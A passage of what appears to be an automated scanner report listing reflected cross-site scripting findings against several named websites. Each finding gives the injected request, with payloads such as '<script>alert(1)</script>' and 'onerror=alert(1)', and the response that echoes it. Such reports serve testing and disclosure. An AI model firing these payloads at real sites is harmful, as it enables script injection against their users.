This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico17e5b<a>fb17bacaecf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=bsf5hppdchrs7ogv1uva6oq6j4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6872

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.ico17e5b<a>fb17bacaecf</TITLE>
<meta name="description" content="Jhoos is a S
...[SNIP]...
<h2>Favicon.ico17e5b<a>fb17bacaecf - Social Networking Service</h2>
...[SNIP]...

7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ab3"><a>93ba235f49e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico66ab3"><a>93ba235f49e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=in94nd37n4bgqenf549sce0po2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:16 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.ico66ab3"><a>93ba235f49e</TITLE>
<meta name="description" content="Jhoos is a Social Networking service in Favicon.ico66ab3"><a>93ba235f49e. No subscription fees and lifetime membership with text and audio video chat features. Download now and join Jhoos to meet your soulmate.">
...[SNIP]...

7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173eb"><a>a0411f48fb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico173eb"><a>a0411f48fb2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:56:31 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=15918175;expires=Tue, 23-Apr-2041 23:56:32 GMT;path=/
Set-Cookie: CFTOKEN=981019a1f9e493e2-ADFDF4B8-BFA4-2A91-25D8EA90828DDE67;expires=Tue, 23-Apr-2041 23:56:32 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<a href="/404handler.cfm?inbound=?404;http://www.lenox.com/favicon.ico173eb"><a>a0411f48fb2&forceLogin=1">
...[SNIP]...

7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b0a"><a>2482c2c1d93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?85b0a"><a>2482c2c1d93=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:55:55 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=15918082;expires=Tue, 23-Apr-2041 23:55:55 GMT;path=/
Set-Cookie: CFTOKEN=bc814721ef0ecd70-ADFD650B-A288-A196-8159C84365A59A5F;expires=Tue, 23-Apr-2041 23:55:55 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<a href="/404handler.cfm?inbound=?404;http://www.lenox.com/favicon.ico?85b0a"><a>2482c2c1d93=1&forceLogin=1">
...[SNIP]...

7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mygiftcardsite.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e95"><script>alert(1)</script>95ad170de98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?47e95"><script>alert(1)</script>95ad170de98=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mygiftcardsite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Manage Your Gift Card </title>

</head>
<frameset rows="100%,*" border
...[SNIP]...
<frame src="http://www.kpfprepaid.com/mygiftcardsite//favicon.ico?47e95"><script>alert(1)</script>95ad170de98=1" frameborder="0" />
...[SNIP]...

7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb710<img%20src%3da%20onerror%3dalert(1)>f86d9201f7 was submitted in the REST URL parameter 5. This input was echoed as bb710<img src=a onerror=alert(1)>f86d9201f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797bb710<img%20src%3da%20onerror%3dalert(1)>f86d9201f7/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:46 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55819


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 1797bb710<img src=a onerror=alert(1)>f86d9201f7 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4959'%3b64a48987fe2 was submitted in the REST URL parameter 5. This input was echoed as e4959';64a48987fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1797e4959'%3b64a48987fe2/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:40 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:53:40 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 50755


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797e4959';64a48987fe2/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2234c"><img%20src%3da%20onerror%3dalert(1)>163cbf2dcf5 was submitted in the REST URL parameter 5. This input was echoed as 2234c"><img src=a onerror=alert(1)>163cbf2dcf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17972234c"><img%20src%3da%20onerror%3dalert(1)>163cbf2dcf5/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/17972234c"><img src=a onerror=alert(1)>163cbf2dcf5/N" title="SEO Quotient for ">
...[SNIP]...

7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d36'%3bff7a243e32d was submitted in the REST URL parameter 6. This input was echoed as c0d36';ff7a243e32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1797/Nc0d36'%3bff7a243e32d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797/Nc0d36';ff7a243e32d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 96a80<img%20src%3da%20onerror%3dalert(1)>b27d9153174 was submitted in the REST URL parameter 6. This input was echoed as 96a80<img src=a onerror=alert(1)>b27d9153174 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797/N96a80<img%20src%3da%20onerror%3dalert(1)>b27d9153174 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:15 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>b27d9153174" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1797/N96a80<img src=a onerror=alert(1)>b27d9153174ddd</a>
...[SNIP]...

7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2db8"><img%20src%3da%20onerror%3dalert(1)>1717bae1296 was submitted in the REST URL parameter 6. This input was echoed as f2db8"><img src=a onerror=alert(1)>1717bae1296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797/Nf2db8"><img%20src%3da%20onerror%3dalert(1)>1717bae1296 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:11 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/1797/Nf2db8"><img src=a onerror=alert(1)>1717bae1296" title="SEO Quotient for ">
...[SNIP]...

7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3cde8<img%20src%3da%20onerror%3dalert(1)>ac3da70dbcd was submitted in the REST URL parameter 5. This input was echoed as 3cde8<img src=a onerror=alert(1)>ac3da70dbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17983cde8<img%20src%3da%20onerror%3dalert(1)>ac3da70dbcd/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:15 GMT
Server: Apache
Set-Cookie: CAKEPHP=klvfjcoqnigb9gf7llh10nva93; expires=Mon, 09-May-2011 02:52:16 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 17983cde8<img src=a onerror=alert(1)>ac3da70dbcd and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907d9'%3b9801195d799 was submitted in the REST URL parameter 5. This input was echoed as 907d9';9801195d799 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1798907d9'%3b9801195d799/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:09 GMT
Server: Apache
Set-Cookie: CAKEPHP=9l1il1vf6rn9o4vqk2b9euqg23; expires=Mon, 09-May-2011 02:52:09 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798907d9';9801195d799/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d6d2"><img%20src%3da%20onerror%3dalert(1)>cca06ff5eb1 was submitted in the REST URL parameter 5. This input was echoed as 9d6d2"><img src=a onerror=alert(1)>cca06ff5eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17989d6d2"><img%20src%3da%20onerror%3dalert(1)>cca06ff5eb1/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:07 GMT
Server: Apache
Set-Cookie: CAKEPHP=qoh4qv7s312s05tb7qp9vth8p6; expires=Mon, 09-May-2011 02:52:08 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/17989d6d2"><img src=a onerror=alert(1)>cca06ff5eb1/N" title="SEO Quotient for ">
...[SNIP]...

7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27c77<img%20src%3da%20onerror%3dalert(1)>e320e195de4 was submitted in the REST URL parameter 6. This input was echoed as 27c77<img src=a onerror=alert(1)>e320e195de4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1798/N27c77<img%20src%3da%20onerror%3dalert(1)>e320e195de4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:04 GMT
Server: Apache
Set-Cookie: CAKEPHP=kkbkcldi43kvgr7kjf9rb3d027; expires=Mon, 09-May-2011 02:53:05 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=kkbkcldi43kvgr7kjf9rb3d027; expires=Mon, 09-May-2011 02:53:05 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>e320e195de4" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1798/N27c77<img src=a onerror=alert(1)>e320e195de4ddd</a>
...[SNIP]...

7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e4c"><img%20src%3da%20onerror%3dalert(1)>fdf07480bd7 was submitted in the REST URL parameter 6. This input was echoed as 10e4c"><img src=a onerror=alert(1)>fdf07480bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1798/N10e4c"><img%20src%3da%20onerror%3dalert(1)>fdf07480bd7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:56 GMT
Server: Apache
Set-Cookie: CAKEPHP=7sjmdmq9ogetig71s5iclg8c02; expires=Mon, 09-May-2011 02:52:57 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=7sjmdmq9ogetig71s5iclg8c02; expires=Mon, 09-May-2011 02:52:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
